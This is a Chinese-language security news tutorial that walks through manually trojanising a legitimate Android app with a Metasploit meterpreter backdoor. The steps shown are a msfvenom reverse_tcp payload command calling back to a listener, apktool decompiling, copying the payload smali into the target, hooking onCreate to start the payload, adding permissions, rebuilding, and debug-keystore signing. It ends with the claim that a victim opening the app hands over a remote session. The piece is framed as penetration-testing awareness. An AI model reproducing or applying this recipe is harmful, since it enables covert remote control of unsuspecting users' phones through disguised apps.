當前位置:
首頁 > 新聞 > 實用教程:手動安卓應用中注入msf後門

實用教程:手動安卓應用中注入msf後門

在移動安全評估中,我們嘗試將一些常用的應用程序載入上後門,並且加上後門之後應用程序毫無異常。這就可以用來證明如果使用的應用程序被種上後門,使用者會毫無知覺。

使用腳本將msf後門注入到安卓程序中已經在上一篇文章進行發表了。這一篇文章會通過手工將後門注入到應用程序中。

步驟一:生成攻擊載荷

metasploit中的msfvenom可以生成多種類型的攻擊載荷,當然我們也可以使用它來生成一個包含msf後門的apk。

使用如下命令:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.169LPORT=4444 R > pentestlab.apkNo platform was selected, choosing Msf::Module::Platform::Android from the payloadNo Arch selected, selecting Arch: dalvik from the payloadNo encoder or badchars specified, outputting raw payloadPayload size: 8839 bytes

步驟二:逆向apk文件

首先,要對目標文件以及剛剛生成的apk文件進行反編譯。使用的工具為眾所周知的apktool。下面命令會將apk反編譯,然後將反編譯出來的代碼保存到一個後綴名為smail的文件中:

java -jar apktool.jar d -f -o payload /root/Downloads/pentestlab.apkI: Using Apktool 2.2.2 on pentestlab.apkI: Loading resource table...I: Decoding AndroidManifest.xml with resources...I: Loading resource table from file: /root/.local/share/apktool/framework/1.apkI: Regular manifest package...I: Decoding file-resources...I: Decoding values */* XMLs...I: Baksmaling classes.dex...I: Copying assets and libs...I: Copying unknown files...I: Copying original files...

步驟三:放置後門文件

將從產生的apk中後門文件放到目標文件中,具體內容以及方式如下:

/root/Downloads/payload/smali/com/metasploit/stage/root/Downloads/original/smali/com/metasploit/stage

步驟四:注入hook

我們必須檢測安卓應用程序清單文件,這樣可以確定在打開安卓應用程序時進行了那些活動。進而確定我們的後門程序會不會執行:

將下圖中的主函數中的代碼內容用後門代碼替換:

;->onCreate(Landroid/os/Bundle;)V

以下代碼會在程序啟動時,執行後門,以及啟動應用程序:

invoke-static , Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

步驟五:給予應用程序許可權

為了使我們的後門能夠更有效的工作,需要給予安卓應用程序應有的許可權。可以將這些額外的許可權添加到安卓清單文件中,這樣的話,如果用戶同意,這個應用程序就會給予後門應有的許可權。

步驟六:編譯應用程序

現在我們已經將後門以及許可權設置注入到目標應用程序當中,我們要對源代碼進行編譯,同樣使用apktool。

java -jar apktool.jar b /root/Downloads/original/

步驟七:對apk進行簽名

如果apk為簽名,那麼apk將不能在手機中安裝。默認的安裝的調試簽名可以在這使用:

jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA /root/Downloads/original/dist/target.apk androiddebugkey

當用戶安裝並且打開存在後門的應用程序時,我們就會得到meterpreter返回的會話:

點擊展開全文

喜歡這篇文章嗎?立刻分享出去讓更多人知道吧!

本站內容充實豐富,博大精深,小編精選每日熱門資訊,隨時更新,點擊「搶先收到最新資訊」瀏覽吧!


請您繼續閱讀更多來自 嘶吼RoarTalk 的精彩文章:

HackerOne年度報告:安全眾測推出四年,成果幾何?
出門刷卡要小心!一種可以從POS機終端收集信用卡信息的惡意軟體出現了
利用 SSDP 協議生成 100 Gbps DDoS 流量的真相探秘
CIA如何追蹤目標的真實地理位置?掃描附近公共WiFi

TAG:嘶吼RoarTalk |

您可能感興趣

入門實用篇,教你學會手動對焦
在Mybatis中使用手動加鎖的方式操作資料庫
Apple Watch 新專利:支持生物識別,不用再手動輸入密碼了
Oculus開發新型手動追蹤系統
微軟構建Cardiolens系統,無需手動,完成生命體征的實時顯示
YouTube Kids App改為純手動推薦,消除視頻負面影響
如何在 Ubuntu 桌面手動添加應用快捷方式
iPhone 8、X隨便用:蘋果強調手動降頻針對老機型
Newegg平台怎樣自己動手提交deal去參加促銷活動?手動提交deal參加促銷活動操作步驟介紹
真正的智能化,省略手動啟動「Hey,Siri」,watchOS 5的測試版使用
新方法用音樂傳輸密碼到手機,不用再手動輸入
真香!Nike發布Adapt BB智能籃球運動鞋 不用手動系鞋帶
純乾貨:法國站Cdiscount手動上傳產品詳解
蘋果:HomePod不支持手動調節EQ功能
如何在 Debian/Ubuntu 上手動安裝安全更新?
iPhone 6、6S、7用戶手動解除降速要注意:後果嚴重
一線 | Youtube槍擊案兇手動機確認:不滿視頻審查政策
不用手動調節吸力大小 TINECO添可發布全球首台會思考的智能吸塵器
手動實現Android熱修復
Windows 10升級後導致無聲 但可手動恢複音頻驅動